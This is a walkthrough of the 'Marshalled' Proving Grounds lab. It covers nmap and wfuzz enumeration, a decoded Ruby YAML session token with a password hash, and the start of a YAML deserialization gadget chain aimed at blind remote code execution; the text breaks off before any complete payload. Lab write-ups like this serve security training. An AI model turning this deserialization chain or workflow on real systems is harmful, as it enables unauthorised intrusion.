PG - Marshalled

PG – Marshalled

In this walk through, we will be going through the Marshalled room from Proving Grounds. This room is rated as Intermediate on the platform and it consist of exploitation of a Blind RCE through YAML Deserilization in Ruby on Rails framework for the initial access and a buffer overflow in cname binary for the Privilege Escalation. So, let’s get started without any delay.

Marshalled

Machine Info:

TitleMarshalled
IPaddress192.168.197.190
DifficultyIntermediate
OSLinux
DescriptionMarshalled is an Intermediate level Linux machine which requires exploitation of a Blind RCE through YAML Deserilization in Ruby on Rails framework for the initial access and a buffer overflow in cname binary for the Privilege Escalation.

Enumeration:

  • I started off with a regular aggressive nmap scan and found only two ports opened – 22 (SSH) and 80 (HTTP).

$ sudo nmap -A 192.168.228.237
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-02 23:20 IST

Nmap scan report for 192.168.228.237
Host is up (0.18s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:8.2p1: 
|     	CVE-2020-15778	6.8	https://vulners.com/cve/CVE-2020-15778
|     	C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3	6.8	https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3	*EXPLOIT*
|     	10213DBE-F683-58BB-B6D3-353173626207	6.8	https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207	*EXPLOIT*
|     	PRION:CVE-2020-12062	5.0	https://vulners.com/prion/PRION:CVE-2020-12062
|     	PRION:CVE-2016-20012	5.0	https://vulners.com/prion/PRION:CVE-2016-20012
|     	CVE-2020-12062	5.0	https://vulners.com/cve/CVE-2020-12062
|     	PRION:CVE-2021-28041	4.6	https://vulners.com/prion/PRION:CVE-2021-28041
|     	CVE-2021-28041	4.6	https://vulners.com/cve/CVE-2021-28041
|     	PRION:CVE-2020-15778	4.4	https://vulners.com/prion/PRION:CVE-2020-15778
|     	CVE-2021-41617	4.4	https://vulners.com/cve/CVE-2021-41617
|     	PRION:CVE-2020-14145	4.3	https://vulners.com/prion/PRION:CVE-2020-14145
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|     	CVE-2016-20012	4.3	https://vulners.com/cve/CVE-2016-20012
|     	PRION:CVE-2021-41617	3.5	https://vulners.com/prion/PRION:CVE-2021-41617
|     	PRION:CVE-2021-36368	2.6	https://vulners.com/prion/PRION:CVE-2021-36368
|_    	CVE-2021-36368	2.6	https://vulners.com/cve/CVE-2021-36368
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| vulners: 
|   cpe:/a:apache:http_server:2.4.41: 
|     	PACKETSTORM:176334	7.5	https://vulners.com/packetstorm/PACKETSTORM:176334	*EXPLOIT*
|     	PACKETSTORM:171631	7.5	https://vulners.com/packetstorm/PACKETSTORM:171631	*EXPLOIT*
|     	OSV:BIT-APACHE-2023-25690	7.5	https://vulners.com/osv/OSV:BIT-APACHE-2023-25690
|     	OSV:BIT-APACHE-2022-31813	7.5	https://vulners.com/osv/OSV:BIT-APACHE-2022-31813
|     	OSV:BIT-APACHE-2022-23943	7.5	https://vulners.com/osv/OSV:BIT-APACHE-2022-23943
|     	OSV:BIT-APACHE-2022-22720	7.5	https://vulners.com/osv/OSV:BIT-APACHE-2022-22720
|     	OSV:BIT-APACHE-2021-44790	7.5	https://vulners.com/osv/OSV:BIT-APACHE-2021-44790
|     	OSV:BIT-APACHE-2021-42013	7.5	https://vulners.com/osv/OSV:BIT-APACHE-2021-42013
|     	OSV:BIT-APACHE-2021-41773	7.5	https://vulners.com/osv/OSV:BIT-APACHE-2021-41773
|     	OSV:BIT-APACHE-2021-39275	7.5	https://vulners.com/osv/OSV:BIT-APACHE-2021-39275
|     	OSV:BIT-APACHE-2021-26691	7.5	https://vulners.com/osv/OSV:BIT-APACHE-2021-26691
|     	OSV:BIT-APACHE-2020-11984	7.5	https://vulners.com/osv/OSV:BIT-APACHE-2020-11984
|     	MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE-	7.5	https://vulners.com/metasploit/MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE-	*EXPLOIT*
|     	MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH-	7.5	https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH-	*EXPLOIT*
|     	F9C0CD4B-3B60-5720-AE7A-7CC31DB839C5	7.5	https://vulners.com/githubexploit/F9C0CD4B-3B60-5720-AE7A-7CC31DB839C5	*EXPLOIT*
|     	EDB-ID:50512	7.5	https://vulners.com/exploitdb/EDB-ID:50512	*EXPLOIT*
|     	EDB-ID:50446	7.5	https://vulners.com/exploitdb/EDB-ID:50446	*EXPLOIT*
|     	EDB-ID:50406	7.5	https://vulners.com/exploitdb/EDB-ID:50406	*EXPLOIT*
|     	E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6	7.5	https://vulners.com/githubexploit/E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6	*EXPLOIT*
|     	CVE-2023-25690	7.5	https://vulners.com/cve/CVE-2023-25690
|     	CVE-2022-31813	7.5	https://vulners.com/cve/CVE-2022-31813
|     	CVE-2022-23943	7.5	https://vulners.com/cve/CVE-2022-23943
|     	CVE-2022-22720	7.5	https://vulners.com/cve/CVE-2022-22720
|     	CVE-2021-44790	7.5	https://vulners.com/cve/CVE-2021-44790
|     	CVE-2021-39275	7.5	https://vulners.com/cve/CVE-2021-39275
|     	CVE-2021-26691	7.5	https://vulners.com/cve/CVE-2021-26691
|     	CVE-2020-11984	7.5	https://vulners.com/cve/CVE-2020-11984
|     	CNVD-2022-73123	7.5	https://vulners.com/cnvd/CNVD-2022-73123
|     	CNVD-2022-03225	7.5	https://vulners.com/cnvd/CNVD-2022-03225
|     	CNVD-2021-102386	7.5	https://vulners.com/cnvd/CNVD-2021-102386
|     	CC15AE65-B697-525A-AF4B-38B1501CAB49	7.5	https://vulners.com/githubexploit/CC15AE65-B697-525A-AF4B-38B1501CAB49	*EXPLOIT*
|     	9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5	7.5	https://vulners.com/githubexploit/9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5	*EXPLOIT*
|     	8713FD59-264B-5FD7-8429-3251AB5AB3B8	7.5	https://vulners.com/githubexploit/8713FD59-264B-5FD7-8429-3251AB5AB3B8	*EXPLOIT*
|     	6A0A657E-8300-5312-99CE-E11F460B1DBF	7.5	https://vulners.com/githubexploit/6A0A657E-8300-5312-99CE-E11F460B1DBF	*EXPLOIT*
|     	61075B23-F713-537A-9B84-7EB9B96CF228	7.5	https://vulners.com/githubexploit/61075B23-F713-537A-9B84-7EB9B96CF228	*EXPLOIT*
|     	5C1BB960-90C1-5EBF-9BEF-F58BFFDFEED9	7.5	https://vulners.com/githubexploit/5C1BB960-90C1-5EBF-9BEF-F58BFFDFEED9	*EXPLOIT*
|     	5312D04F-9490-5472-84FA-86B3BBDC8928	7.5	https://vulners.com/githubexploit/5312D04F-9490-5472-84FA-86B3BBDC8928	*EXPLOIT*
|     	52E13088-9643-5E81-B0A0-B7478BCF1F2C	7.5	https://vulners.com/githubexploit/52E13088-9643-5E81-B0A0-B7478BCF1F2C	*EXPLOIT*
|     	3F17CA20-788F-5C45-88B3-E12DB2979B7B	7.5	https://vulners.com/githubexploit/3F17CA20-788F-5C45-88B3-E12DB2979B7B	*EXPLOIT*
|     	22DCCD26-B68C-5905-BAC2-71D10DE3F123	7.5	https://vulners.com/githubexploit/22DCCD26-B68C-5905-BAC2-71D10DE3F123	*EXPLOIT*
|     	2108729F-1E99-54EF-9A4B-47299FD89FF2	7.5	https://vulners.com/githubexploit/2108729F-1E99-54EF-9A4B-47299FD89FF2	*EXPLOIT*
|     	1337DAY-ID-39214	7.5	https://vulners.com/zdt/1337DAY-ID-39214*EXPLOIT*
|     	1337DAY-ID-38427	7.5	https://vulners.com/zdt/1337DAY-ID-38427*EXPLOIT*
|     	1337DAY-ID-37777	7.5	https://vulners.com/zdt/1337DAY-ID-37777*EXPLOIT*
|     	1337DAY-ID-36952	7.5	https://vulners.com/zdt/1337DAY-ID-36952*EXPLOIT*
|     	1337DAY-ID-34882	7.5	https://vulners.com/zdt/1337DAY-ID-34882*EXPLOIT*
|     	OSV:BIT-APACHE-2021-40438	6.8	https://vulners.com/osv/OSV:BIT-APACHE-2021-40438
|     	OSV:BIT-APACHE-2020-35452	6.8	https://vulners.com/osv/OSV:BIT-APACHE-2020-35452
|     	FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8	6.8	https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8	*EXPLOIT*
|     	CVE-2021-40438	6.8	https://vulners.com/cve/CVE-2021-40438
|     	CVE-2020-35452	6.8	https://vulners.com/cve/CVE-2020-35452
|     	CNVD-2022-03224	6.8	https://vulners.com/cnvd/CNVD-2022-03224
|     	AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C	6.8	https://vulners.com/githubexploit/AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C	*EXPLOIT*
|     	8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2	6.8	https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2	*EXPLOIT*
|     	4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332	6.8	https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332	*EXPLOIT*
|     	4373C92A-2755-5538-9C91-0469C995AA9B	6.8	https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B	*EXPLOIT*
|     	36618CA8-9316-59CA-B748-82F15F407C4F	6.8	https://vulners.com/githubexploit/36618CA8-9316-59CA-B748-82F15F407C4F	*EXPLOIT*
|     	0095E929-7573-5E4A-A7FA-F6598A35E8DE	6.8	https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE	*EXPLOIT*
|     	OSV:BIT-APACHE-2022-28615	6.4	https://vulners.com/osv/OSV:BIT-APACHE-2022-28615
|     	OSV:BIT-APACHE-2021-44224	6.4	https://vulners.com/osv/OSV:BIT-APACHE-2021-44224
|     	OSV:BIT-2023-31122	6.4	https://vulners.com/osv/OSV:BIT-2023-31122
|     	CVE-2022-28615	6.4	https://vulners.com/cve/CVE-2022-28615
|     	CVE-2021-44224	6.4	https://vulners.com/cve/CVE-2021-44224
|     	OSV:BIT-APACHE-2022-22721	5.8	https://vulners.com/osv/OSV:BIT-APACHE-2022-22721
|     	CVE-2022-22721	5.8	https://vulners.com/cve/CVE-2022-22721
|     	CVE-2020-1927	5.8	https://vulners.com/cve/CVE-2020-1927
|     	OSV:BIT-APACHE-2022-36760	5.1	https://vulners.com/osv/OSV:BIT-APACHE-2022-36760
|     	CVE-2022-36760	5.1	https://vulners.com/cve/CVE-2022-36760
|     	OSV:BIT-APACHE-2023-45802	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2023-45802
|     	OSV:BIT-APACHE-2023-43622	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2023-43622
|     	OSV:BIT-APACHE-2023-31122	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2023-31122
|     	OSV:BIT-APACHE-2023-27522	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2023-27522
|     	OSV:BIT-APACHE-2022-37436	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2022-37436
|     	OSV:BIT-APACHE-2022-30556	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2022-30556
|     	OSV:BIT-APACHE-2022-30522	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2022-30522
|     	OSV:BIT-APACHE-2022-29404	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2022-29404
|     	OSV:BIT-APACHE-2022-28614	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2022-28614
|     	OSV:BIT-APACHE-2022-28330	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2022-28330
|     	OSV:BIT-APACHE-2022-26377	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2022-26377
|     	OSV:BIT-APACHE-2022-22719	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2022-22719
|     	OSV:BIT-APACHE-2021-41524	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2021-41524
|     	OSV:BIT-APACHE-2021-36160	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2021-36160
|     	OSV:BIT-APACHE-2021-34798	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2021-34798
|     	OSV:BIT-APACHE-2021-33193	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2021-33193
|     	OSV:BIT-APACHE-2021-31618	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2021-31618
|     	OSV:BIT-APACHE-2021-30641	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2021-30641
|     	OSV:BIT-APACHE-2021-26690	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2021-26690
|     	OSV:BIT-APACHE-2020-9490	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2020-9490
|     	OSV:BIT-APACHE-2020-13950	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2020-13950
|     	OSV:BIT-2023-45802	5.0	https://vulners.com/osv/OSV:BIT-2023-45802
|     	OSV:BIT-2023-43622	5.0	https://vulners.com/osv/OSV:BIT-2023-43622
|     	F7F6E599-CEF4-5E03-8E10-FE18C4101E38	5.0	https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38	*EXPLOIT*
|     	E5C174E5-D6E8-56E0-8403-D287DE52EB3F	5.0	https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F	*EXPLOIT*
|     	DB6E1BBD-08B1-574D-A351-7D6BB9898A4A	5.0	https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A	*EXPLOIT*
|     	CVE-2023-31122	5.0	https://vulners.com/cve/CVE-2023-31122
|     	CVE-2023-27522	5.0	https://vulners.com/cve/CVE-2023-27522
|     	CVE-2022-37436	5.0	https://vulners.com/cve/CVE-2022-37436
|     	CVE-2022-30556	5.0	https://vulners.com/cve/CVE-2022-30556
|     	CVE-2022-29404	5.0	https://vulners.com/cve/CVE-2022-29404
|     	CVE-2022-28614	5.0	https://vulners.com/cve/CVE-2022-28614
|     	CVE-2022-26377	5.0	https://vulners.com/cve/CVE-2022-26377
|     	CVE-2022-22719	5.0	https://vulners.com/cve/CVE-2022-22719
|     	CVE-2021-36160	5.0	https://vulners.com/cve/CVE-2021-36160
|     	CVE-2021-34798	5.0	https://vulners.com/cve/CVE-2021-34798
|     	CVE-2021-33193	5.0	https://vulners.com/cve/CVE-2021-33193
|     	CVE-2021-30641	5.0	https://vulners.com/cve/CVE-2021-30641
|     	CVE-2021-26690	5.0	https://vulners.com/cve/CVE-2021-26690
|     	CVE-2020-9490	5.0	https://vulners.com/cve/CVE-2020-9490
|     	CVE-2020-1934	5.0	https://vulners.com/cve/CVE-2020-1934
|     	CVE-2020-13950	5.0	https://vulners.com/cve/CVE-2020-13950
|     	CVE-2019-17567	5.0	https://vulners.com/cve/CVE-2019-17567
|     	CVE-2006-20001	5.0	https://vulners.com/cve/CVE-2006-20001
|     	CNVD-2023-93320	5.0	https://vulners.com/cnvd/CNVD-2023-93320
|     	CNVD-2023-80558	5.0	https://vulners.com/cnvd/CNVD-2023-80558
|     	CNVD-2022-73122	5.0	https://vulners.com/cnvd/CNVD-2022-73122
|     	CNVD-2022-53584	5.0	https://vulners.com/cnvd/CNVD-2022-53584
|     	CNVD-2022-53582	5.0	https://vulners.com/cnvd/CNVD-2022-53582
|     	CNVD-2022-03223	5.0	https://vulners.com/cnvd/CNVD-2022-03223
|     	C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B	5.0	https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B	*EXPLOIT*
|     	BD3652A9-D066-57BA-9943-4E34970463B9	5.0	https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9	*EXPLOIT*
|     	B0208442-6E17-5772-B12D-B5BE30FA5540	5.0	https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540	*EXPLOIT*
|     	A820A056-9F91-5059-B0BC-8D92C7A31A52	5.0	https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52	*EXPLOIT*
|     	9814661A-35A4-5DB7-BB25-A1040F365C81	5.0	https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81	*EXPLOIT*
|     	5A864BCC-B490-5532-83AB-2E4109BB3C31	5.0	https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31	*EXPLOIT*
|     	17C6AD2A-8469-56C8-BBBE-1764D0DF1680	5.0	https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680	*EXPLOIT*
|     	OSV:BIT-APACHE-2020-11993	4.3	https://vulners.com/osv/OSV:BIT-APACHE-2020-11993
|     	FF610CB4-801A-5D1D-9AC9-ADFC287C8482	4.3	https://vulners.com/githubexploit/FF610CB4-801A-5D1D-9AC9-ADFC287C8482	*EXPLOIT*
|     	FDF4BBB1-979C-5320-95EA-9EC7EB064D72	4.3	https://vulners.com/githubexploit/FDF4BBB1-979C-5320-95EA-9EC7EB064D72	*EXPLOIT*
|     	FCAF01A0-F921-5DB1-BBC5-850EC2DC5C46	4.3	https://vulners.com/githubexploit/FCAF01A0-F921-5DB1-BBC5-850EC2DC5C46	*EXPLOIT*
|     	EDB-ID:50383	4.3	https://vulners.com/exploitdb/EDB-ID:50383	*EXPLOIT*
|     	E7B177F6-FA62-52FE-A108-4B8FC8112B7F	4.3	https://vulners.com/githubexploit/E7B177F6-FA62-52FE-A108-4B8FC8112B7F	*EXPLOIT*
|     	E6B39247-8016-5007-B505-699F05FCA1B5	4.3	https://vulners.com/githubexploit/E6B39247-8016-5007-B505-699F05FCA1B5	*EXPLOIT*
|     	DBF996C3-DC2A-5859-B767-6B2FC38F2185	4.3	https://vulners.com/githubexploit/DBF996C3-DC2A-5859-B767-6B2FC38F2185	*EXPLOIT*
|     	D0E79214-C9E8-52BD-BC24-093970F5F34E	4.3	https://vulners.com/githubexploit/D0E79214-C9E8-52BD-BC24-093970F5F34E	*EXPLOIT*
|     	CVE-2020-11993	4.3	https://vulners.com/cve/CVE-2020-11993
|     	CF47F8BF-37F7-5EF9-ABAB-E88ECF6B64FE	4.3	https://vulners.com/githubexploit/CF47F8BF-37F7-5EF9-ABAB-E88ECF6B64FE	*EXPLOIT*
|     	CD48BD40-E52A-5A8B-AE27-B57C358BB0EE	4.3	https://vulners.com/githubexploit/CD48BD40-E52A-5A8B-AE27-B57C358BB0EE	*EXPLOIT*
|     	C8C7BBD4-C089-5DA7-8474-A5B2B7DC5E79	4.3	https://vulners.com/githubexploit/C8C7BBD4-C089-5DA7-8474-A5B2B7DC5E79	*EXPLOIT*
|     	C8799CA3-C88C-5B39-B291-2895BE0D9133	4.3	https://vulners.com/githubexploit/C8799CA3-C88C-5B39-B291-2895BE0D9133	*EXPLOIT*
|     	C0380E16-C468-5540-A427-7FE34E7CF36B	4.3	https://vulners.com/githubexploit/C0380E16-C468-5540-A427-7FE34E7CF36B	*EXPLOIT*
|     	BC027F41-02AD-5D71-A452-4DD62B0F1EE1	4.3	https://vulners.com/githubexploit/BC027F41-02AD-5D71-A452-4DD62B0F1EE1	*EXPLOIT*
|     	B946B2A1-2914-537A-BF26-94B48FC501B3	4.3	https://vulners.com/githubexploit/B946B2A1-2914-537A-BF26-94B48FC501B3	*EXPLOIT*
|     	B9151905-5395-5622-B789-E16B88F30C71	4.3	https://vulners.com/githubexploit/B9151905-5395-5622-B789-E16B88F30C71	*EXPLOIT*
|     	B58E6202-6D04-5CB0-8529-59713C0E13B8	4.3	https://vulners.com/githubexploit/B58E6202-6D04-5CB0-8529-59713C0E13B8	*EXPLOIT*
|     	B53D7077-1A2B-5640-9581-0196F6138301	4.3	https://vulners.com/githubexploit/B53D7077-1A2B-5640-9581-0196F6138301	*EXPLOIT*
|     	A9C7FB0F-65EC-5557-B6E8-6AFBBF8F140F	4.3	https://vulners.com/githubexploit/A9C7FB0F-65EC-5557-B6E8-6AFBBF8F140F	*EXPLOIT*
|     	9EE3F7E3-70E6-503E-9929-67FE3F3735A2	4.3	https://vulners.com/githubexploit/9EE3F7E3-70E6-503E-9929-67FE3F3735A2	*EXPLOIT*
|     	9D511461-7D24-5402-8E2A-58364D6E758F	4.3	https://vulners.com/githubexploit/9D511461-7D24-5402-8E2A-58364D6E758F	*EXPLOIT*
|     	9CEA663C-6236-5F45-B207-A873B971F988	4.3	https://vulners.com/githubexploit/9CEA663C-6236-5F45-B207-A873B971F988	*EXPLOIT*
|     	987C6FDB-3E70-5FF5-AB5B-D50065D27594	4.3	https://vulners.com/githubexploit/987C6FDB-3E70-5FF5-AB5B-D50065D27594	*EXPLOIT*
|     	789B6112-E84C-566E-89A7-82CC108EFCD9	4.3	https://vulners.com/githubexploit/789B6112-E84C-566E-89A7-82CC108EFCD9	*EXPLOIT*
|     	788F7DF8-01F3-5D13-9B3E-E4AA692153E6	4.3	https://vulners.com/githubexploit/788F7DF8-01F3-5D13-9B3E-E4AA692153E6	*EXPLOIT*
|     	749F952B-3ACF-56B2-809D-D66E756BE839	4.3	https://vulners.com/githubexploit/749F952B-3ACF-56B2-809D-D66E756BE839	*EXPLOIT*
|     	6E484197-456B-55DF-8D51-C2BB4925F45C	4.3	https://vulners.com/githubexploit/6E484197-456B-55DF-8D51-C2BB4925F45C	*EXPLOIT*
|     	68E78C64-D93A-5E8B-9DEA-4A8D826B474E	4.3	https://vulners.com/githubexploit/68E78C64-D93A-5E8B-9DEA-4A8D826B474E	*EXPLOIT*
|     	6758CFA9-271A-5E99-A590-E51F4E0C5046	4.3	https://vulners.com/githubexploit/6758CFA9-271A-5E99-A590-E51F4E0C5046	*EXPLOIT*
|     	674BA200-C494-57E6-B1B4-1672DDA15D3C	4.3	https://vulners.com/githubexploit/674BA200-C494-57E6-B1B4-1672DDA15D3C	*EXPLOIT*
|     	5A54F5DA-F9C1-508B-AD2D-3E45CD647D31	4.3	https://vulners.com/githubexploit/5A54F5DA-F9C1-508B-AD2D-3E45CD647D31	*EXPLOIT*
|     	4E5A5BA8-3BAF-57F0-B71A-F04B4D066E4F	4.3	https://vulners.com/githubexploit/4E5A5BA8-3BAF-57F0-B71A-F04B4D066E4F	*EXPLOIT*
|     	4C79D8E5-D595-5460-AA84-18D4CB93E8FC	4.3	https://vulners.com/githubexploit/4C79D8E5-D595-5460-AA84-18D4CB93E8FC	*EXPLOIT*
|     	4B44115D-85A3-5E62-B9A8-5F336C24673F	4.3	https://vulners.com/githubexploit/4B44115D-85A3-5E62-B9A8-5F336C24673F	*EXPLOIT*
|     	3CF66144-235E-5F7A-B889-113C11ABF150	4.3	https://vulners.com/githubexploit/3CF66144-235E-5F7A-B889-113C11ABF150	*EXPLOIT*
|     	379FCF38-0B4A-52EC-BE3E-408A0467BF20	4.3	https://vulners.com/githubexploit/379FCF38-0B4A-52EC-BE3E-408A0467BF20	*EXPLOIT*
|     	365CD0B0-D956-59D6-9500-965BF4017E2D	4.3	https://vulners.com/githubexploit/365CD0B0-D956-59D6-9500-965BF4017E2D	*EXPLOIT*
|     	2E98EA81-24D1-5D5B-80B9-A8D616BF3C3F	4.3	https://vulners.com/githubexploit/2E98EA81-24D1-5D5B-80B9-A8D616BF3C3F	*EXPLOIT*
|     	2B4FEB27-377B-557B-AE46-66D677D5DA1C	4.3	https://vulners.com/githubexploit/2B4FEB27-377B-557B-AE46-66D677D5DA1C	*EXPLOIT*
|     	1B75F2E2-5B30-58FA-98A4-501B91327D7F	4.3	https://vulners.com/githubexploit/1B75F2E2-5B30-58FA-98A4-501B91327D7F	*EXPLOIT*
|     	1337DAY-ID-35422	4.3	https://vulners.com/zdt/1337DAY-ID-35422*EXPLOIT*
|     	1145F3D1-0ECB-55AA-B25D-A26892116505	4.3	https://vulners.com/githubexploit/1145F3D1-0ECB-55AA-B25D-A26892116505	*EXPLOIT*
|     	108A0713-4AB8-5A1F-A16B-4BB13ECEC9B2	4.3	https://vulners.com/githubexploit/108A0713-4AB8-5A1F-A16B-4BB13ECEC9B2	*EXPLOIT*
|     	0BC014D0-F944-5E78-B5FA-146A8E5D0F8A	4.3	https://vulners.com/githubexploit/0BC014D0-F944-5E78-B5FA-146A8E5D0F8A	*EXPLOIT*
|     	06076ECD-3FB7-53EC-8572-ABBB20029812	4.3	https://vulners.com/githubexploit/06076ECD-3FB7-53EC-8572-ABBB20029812	*EXPLOIT*
|     	05403438-4985-5E78-A702-784E03F724D4	4.3	https://vulners.com/githubexploit/05403438-4985-5E78-A702-784E03F724D4	*EXPLOIT*
|     	00EC8F03-D8A3-56D4-9F8C-8DD1F5ACCA08	4.3	https://vulners.com/githubexploit/00EC8F03-D8A3-56D4-9F8C-8DD1F5ACCA08	*EXPLOIT*
|     	CVE-2023-45802	2.6	https://vulners.com/cve/CVE-2023-45802
|_    	OSV:BIT-APACHE-2020-13938	2.1	https://vulners.com/osv/OSV:BIT-APACHE-2020-13938
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=2/2%OT=22%CT=1%CU=31756%PV=Y%DS=4%DC=T%G=Y%TM=65BD2BC1
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10B%TI=Z%TS=A)SEQ(SP=106%GCD
OS:=1%ISR=10B%TI=Z%II=I%TS=A)OPS(O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11
OS:NW7%O4=M54EST11NW7%O5=M54EST11NW7%O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE8
OS:8%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)
OS:T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%
OS:T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164
OS:%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=A365%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 111/tcp)
HOP RTT       ADDRESS
1   184.01 ms 192.168.45.1
2   183.97 ms 192.168.45.254
3   184.15 ms 192.168.251.1
4   184.18 ms 192.168.228.237

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.09 seconds

nmap scan

  • Added the domain name to my /etc/hosts file

adding domain in /etc/hosts

  • Enumerated the web server on port 80 which reveals a static web page.

marshalled.pg

  • Next, i suspect there might be subdomains related to our current domain. So, performed subdomain bruteforcing using wfuzz which reveals a subdomain named “monitoring”.

$ wfuzz -u http://marshalled.pg/ -H "Host: FUZZ.marshalled.pg" -w ~/Desktop/Wordlist/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --hh 868
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://marshalled.pg/
Total requests: 4989

===================================================================
ID           Response   Lines    Word     Chars       Payload                      
===================================================================

000000346:   200        102 L    266 W    4045 Ch     "monitoring"                 

Total time: 126.7590
Processed Requests: 4989
Filtered Requests: 4988
Requests/sec.: 39.35813

wfuzz subdomain enumeration

  • Added the subdomain to my /etc/hosts file.

adding monitoring.marshalled.pg

  • Accessed the web server running on the subdomain. It was running an “Internal Monitoring Application” on it.

Internal Monitoring Application

  • Found a login panel page on it. Got in using the common username and password combo.

login panel

  • The internal dashboard divulges some system information.

internal dashboard

Initial Access:

  • After banging my head against the wall on this for eternity, I came to know that the remember me parameter on the login page is vulnerable to Blind RCE through YAML Deserialization in Ruby on Rails framework. For that, we first have to intercept the login request and Send it to Repeater, in order to play with this further.

Burpsuite POST request

302 Found

  • Decode the above captured remember_me token in response and go through the ruby code in it. This gives us the YAML version responsible for the vulnerability.

YAML version found

--- !ruby/object:User
concise_attributes:
- !
ruby/object:ActiveModel::Attribute::FromDatab
ase
  name: id
  value_before_type_cast: 104

- !ruby/object:ActiveModel::Attribute::FromDa
tabase
  name: username
  value_before_type_c
ast: admin
- !ruby/object:ActiveModel::Attrib
ute::FromDatabase
  name: password_digest
  v
alue_before_type_cast: "$2a$12$ogjC9QG2BTiLQo
hzwmR7au3JHj/MwqWsMb2RrsHN7NYilSN.SFejO"
- !r
uby/object:ActiveModel::Attribute::FromDataba
se
  name: created_at
  value_before_type_cas
t: '2022-09-13 20:06:13.809506'
- !ruby/objec
t:ActiveModel::Attribute::FromDatabase
  name
: updated_at
  value_before_type_cast: '2022-
09-13 20:06:13.809506'
new_record: false
acti
ve_record_yaml_version: 2

  • Now as per the below POC, we will generate a YAML file that will contain over reverse shell payload in it.

POC: https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/

---
 - !ruby/object:Gem::Installer
     i: x
 - !ruby/object:Gem::SpecFetcher
     i: y
